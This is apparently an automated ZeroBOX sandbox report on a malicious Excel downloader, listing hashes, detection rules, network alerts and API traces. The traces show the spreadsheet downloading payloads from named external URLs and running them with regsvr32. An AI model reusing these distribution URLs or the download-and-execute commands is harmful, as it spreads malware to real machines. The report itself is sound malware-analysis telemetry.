Summary | ZeroBOX

index-1862925899.xls

Downloader MSOffice File
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 7, 2021, 9:32 a.m. Nov. 7, 2021, 9:34 a.m.
Size 109.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:19:34 2015, Last Saved Time/Date: Thu Nov 4 14:50:52 2021, Security: 0
MD5 18e464bb54f5c85ea6caf14487ced92c
SHA256 5f0dd968ec5c7367841771f92022d9d76c36f1d18796afb318ea96e6c9cd6bd1
CRC32 8F8853C2
ssdeep 3072:JKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgiMjmwHAfvperDmy:JKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgiw
Yara
  • Microsoft_Office_File_Downloader_Zero - Microsoft Office File Downloader
  • Microsoft_Office_File_Zero - Microsoft Office File

IP Address Status Action
108.179.192.18 Active Moloch
108.179.193.34 Active Moloch
164.124.101.2 Active Moloch
23.111.163.242 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49164 -> 108.179.193.34:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 108.179.193.34:443 -> 192.168.56.103:49165 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 108.179.192.18:443 -> 192.168.56.103:49169 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49168 -> 108.179.192.18:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49172 -> 23.111.163.242:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 23.111.163.242:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 23.111.163.242:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 23.111.163.242:443 -> 192.168.56.103:49172 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 23.111.163.242:443 -> 192.168.56.103:49172 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49163 -> 108.179.193.34:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49167 -> 108.179.192.18:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49171 -> 23.111.163.242:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49171 -> 23.111.163.242:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49171 -> 23.111.163.242:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 23.111.163.242:443 -> 192.168.56.103:49171 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 23.111.163.242:443 -> 192.168.56.103:49171 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49173 -> 23.111.163.242:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49173 -> 23.111.163.242:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 23.111.163.242:443 -> 192.168.56.103:49173 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 23.111.163.242:443 -> 192.168.56.103:49173 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2372
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bd28000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2372
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ae52000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c201000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2668
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c201000
process_handle: 0xffffffff
1 0 0
cmdline regsvr32 C:\Datop\good.good
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\good1.good
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\good.good
cmdline regsvr32 C:\Datop\good1.good
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\good2.good
cmdline regsvr32 C:\Datop\good2.good
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2372
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef60000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: https://decinfo.com.br/s4hfZyv7NFEM/y9.html
stack_pivoted: 0
filepath_r: C:\Datop\good.good
filepath: C:\Datop\good.good
2148270085 0

URLDownloadToFileW

url: https://imprimija.com.br/BIt2Zlm3/y5.html
stack_pivoted: 0
filepath_r: C:\Datop\good1.good
filepath: C:\Datop\good1.good
2148270085 0

URLDownloadToFileW

url: https://stunningmax.com/JR3xNs7W7Wm1/y1.html
stack_pivoted: 0
filepath_r: C:\Datop\good2.good
filepath: C:\Datop\good2.good
2148270085 0
parent_process excel.exe martian_process regsvr32 C:\Datop\good.good
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\good1.good
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\good.good
parent_process excel.exe martian_process regsvr32 C:\Datop\good1.good
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\good2.good
parent_process excel.exe martian_process regsvr32 C:\Datop\good2.good
file C:\Windows\System32\regsvr32.exe